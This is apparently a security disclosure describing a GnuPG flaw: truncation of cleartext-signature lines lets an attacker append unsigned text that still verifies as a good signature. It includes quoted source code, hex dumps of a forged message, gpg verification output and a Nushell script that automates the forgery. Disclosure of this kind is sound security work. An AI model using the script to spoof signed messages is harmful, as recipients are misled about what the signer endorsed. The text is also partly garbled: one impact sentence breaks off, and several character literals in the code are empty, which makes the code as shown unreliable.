Cleartext Signature Plaintext Truncated for Hash Calculation

An attacker can extend certain singed messages with arbitrary data in a way that still passed signature verification in GnuPG.

Impact

If an attacker obtains the signature S and plaintext P of a message where the message plaintext contains ‘\f\n’ (or in other words, has a line ending in ‘\f’), the attacker can craft a signature plaintext pair (S,P’) where P’ has attacker controlled inserts at those occurences in the plaintext and still successfully verifies.

Practically this this is applicable to the following scenario:

• An attacker obtains (P, S’) and

Details

GnuPG truncates plaintext lines to 20000 characters minus padding:

#define MAX_LINELEN 20000

// ...

/* read the next line */
maxlen = MAX_LINELEN;
afx->buffer_pos = 0;
afx->buffer_len = iobuf_read_line(a, &afx->buffer,
                                  &afx->buffer_size, &maxlen);
if (!afx->buffer_len) {
  rc = -1; /* eof (should not happen) */
  continue;
}
if (!maxlen) {
  afx->truncated++;
  this_truncated = 1;
} else this_truncated = 0;

// ...

/* Now handle the end-of-line canonicalization */
if (!afx->not_dash_escaped || this_truncated) {
  int crlf = n > 1 && p[n - 2] == '\r' && p[n - 1] == '\n';

  afx->buffer_len =
    trim_trailing_chars(&p[afx->buffer_pos], n - afx->buffer_pos,
                        " \t\r\n");
  afx->buffer_len += afx->buffer_pos;
  /* the buffer is always allocated with enough space to append
   * the removed [CR], LF and a Nul
   * The reason for this complicated procedure is to keep at least
   * the original type of lineending - handling of the removed
   * trailing spaces seems to be impossible in our method
   * of faking a packet; either we have to use a temporary file
   * or calculate the hash here in this module and somehow find
   * a way to send the hash down the processing line (well, a special
   * faked packet could do the job).
         *
         * To make sure that a truncated line triggers a bad
         * signature error we replace a removed LF by a FF or
         * append a FF.  Right, this is a hack but better than a
         * global variable and way easier than to introduce a new
         * control packet or insert a line like "[truncated]\n"
         * into the filter output.
   */
  if (crlf) afx->buffer[afx->buffer_len++] = '\r';
  afx->buffer[afx->buffer_len++] = this_truncated ? '' : '\n';
  afx->buffer[afx->buffer_len] = '';
}

When verifying a message like this:

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

A[19998*A]ABBB
CCC
-----BEGIN PGP SIGNATURE-----

[...]
-----END PGP SIGNATURE-----

The resulting hash buffer then contains A[19998*A]A, the truncation mark \f, and CCC.

However, a similar message with a different payload instead of BBB like this:

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

A[19998*A]AXXX
CCC
-----BEGIN PGP SIGNATURE-----

[...]
-----END PGP SIGNATURE-----

It results in the same hash buffer as before, since the changed section is truncated in the same way.

Furthermore, before the \f gets inserted, the buffer gets its trailing characters trimmed, allowing the \f to appear at any position between 0 and 20,000 when padding it with ’ ’, ‘\t’ or ‘\r’. Using repeated carriage return characters usually results in a single newline, making the attack practically invisible.

Detailed steps to reproduce

Scenario

Mallory sends Alice a payload to sign:

00000000:   53 69 67 6e  65 64 20 70  61 79 6c 6f  61 64 0d 0c   Signed payload__

Alice signs the payload, and sends it back to Mallory:

00000000:   2d 2d 2d 2d  2d 42 45 47  49 4e 20 50  47 50 20 53   -----BEGIN PGP S
00000010:   49 47 4e 45  44 20 4d 45  53 53 41 47  45 2d 2d 2d   IGNED MESSAGE---
00000020:   2d 2d 0a 48  61 73 68 3a  20 53 48 41  35 31 32 0a   --_Hash: SHA512_
00000030:   0a 53 69 67  6e 65 64 20  70 61 79 6c  6f 61 64 0d   _Signed payload_
00000040:   0c 0a 2d 2d  2d 2d 2d 42  45 47 49 4e  20 50 47 50   __-----BEGIN PGP
00000050:   20 53 49 47  4e 41 54 55  52 45 2d 2d  2d 2d 2d 0a    SIGNATURE-----_
[...]
00000100:   67 55 3d 0a  3d 54 56 52  34 0a 2d 2d  2d 2d 2d 45   gU=_=TVR4_-----E
00000110:   4e 44 20 50  47 50 20 53  49 47 4e 41  54 55 52 45   ND PGP SIGNATURE
00000120:   2d 2d 2d 2d  2d                                      -----

Mallory then injects a payload after the signed payload:

00000000:   2d 2d 2d 2d  2d 42 45 47  49 4e 20 50  47 50 20 53   -----BEGIN PGP S
00000010:   49 47 4e 45  44 20 4d 45  53 53 41 47  45 2d 2d 2d   IGNED MESSAGE---
00000020:   2d 2d 0a 48  61 73 68 3a  20 53 48 41  35 31 32 0a   --_Hash: SHA512_
00000030:   0a 53 69 67  6e 65 64 20  70 61 79 6c  6f 61 64 0d   _Signed payload_
00000040:   0d 0d 0d 0d  0d 0d 0d 0d  0d 0d 0d 0d  0d 0d 0d 0d   ________________
[...]
00004e40:   0d 0d 0d 0d  0d 0d 0d 0d  0d 0d 0d 0d  0d 0d 0d 0d   ________________
00004e50:   0c 55 6e 73  69 67 6e 65  64 20 70 61  79 6c 6f 61   _Unsigned payloa
00004e60:   64 0a 2d 2d  2d 2d 2d 42  45 47 49 4e  20 50 47 50   d_-----BEGIN PGP
00004e70:   20 53 49 47  4e 41 54 55  52 45 2d 2d  2d 2d 2d 0a    SIGNATURE-----_
00004e80:   0a 69 48 55  45 41 52 59  4b 41 42 30  57 49 51 54   _iHUEARYKAB0WIQT
00004e90:   78 65 51 4f  30 6b 66 75  59 35 74 50  45 74 50 78   xeQO0kfuY5tPEtPx
00004ea0:   4c 71 31 73  4a 6f 33 75  64 68 77 55  43 61 50 59   Lq1sJo3udhwUCaPY
00004eb0:   39 2b 41 41  4b 43 52 42  4c 71 31 73  4a 6f 33 75   9+AAKCRBLq1sJo3u
00004ec0:   64 0a 68 79  53 4f 41 51  43 6f 6e 6e  36 73 69 57   d_hySOAQConn6siW
00004ed0:   68 31 30 6d  6a 79 4b 45  54 57 43 39  37 58 51 2f   h10mjyKETWC97XQ/
00004ee0:   39 33 45 4d  38 54 76 78  68 64 66 4a  41 61 65 62   93EM8TvxhdfJAaeb
00004ef0:   4f 49 6d 41  45 41 72 32  36 65 4c 47  36 30 34 49   OImAEAr26eLG604I
00004f00:   35 2b 0a 42  32 50 4f 32  66 55 36 64  63 6e 59 73   5+_B2PO2fU6dcnYs
00004f10:   52 50 6d 71  53 4f 6c 4b  6a 34 70 74  48 62 2b 33   RPmqSOlKj4ptHb+3
00004f20:   67 55 3d 0a  3d 54 56 52  34 0a 2d 2d  2d 2d 2d 45   gU=_=TVR4_-----E
00004f30:   4e 44 20 50  47 50 20 53  49 47 4e 41  54 55 52 45   ND PGP SIGNATURE
00004f40:   2d 2d 2d 2d  2d                                      -----

Alice sends the spoofed message to Bob, and Bob verifies it with GnuPG, which succeeds despite the plaintext having additional content:

$ cat cs.long 
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Signed payload
Unsigned payload
-----BEGIN PGP SIGNATURE-----

iHUEARYKAB0WIQTxeQO0kfuY5tPEtPxLq1sJo3udhwUCaPY9+AAKCRBLq1sJo3ud
hySOAQConn6siWh10mjyKETWC97XQ/93EM8TvxhdfJAaebOImAEAr26eLG604I5+
B2PO2fU6dcnYsRPmqSOlKj4ptHb+3gU=
=TVR4
-----END PGP SIGNATURE-----
$ gpg --verify cs.long
gpg: invalid armor: line longer than 20000 characters
gpg: Signature made Mon 20 Oct 2025 03:49:44 PM CEST
gpg:                using EDDSA key F17903B491FB98E6D3C4B4FC4BAB5B09A37B9D87
gpg: Good signature from "online" [ultimate]

A script to automate this is provided:

let signed_payload = "Signed payload"
let unsigned_payload = "Unsigned payload"

let payload = ($signed_payload | fill -c "\r" -w 19999) + "" + $unsigned_payload

let cs_good = "plaintext" | gpg -au online --clearsign

let ds_long = $payload
| str substring 0..<19998
| str replace -ra '[ \t\r\n]+$' (if ($in | split chars | last) == "\r" { "\r" } else { '' })
| bytes build ($in | into binary) 0x[0c]
| do {$in | save -f payload.ds; $in} $in
| gpg -au online --clearsign
| do {$in | save -f payload.ds.asc; $in} $in
| lines | skip 4 | str join "\n"

let spoofed = $cs_good | lines | first 3 | append [$payload $ds_long] | str join "\n"

$spoofed | save -f payload.spoofed.asc
gpg --verify cs.long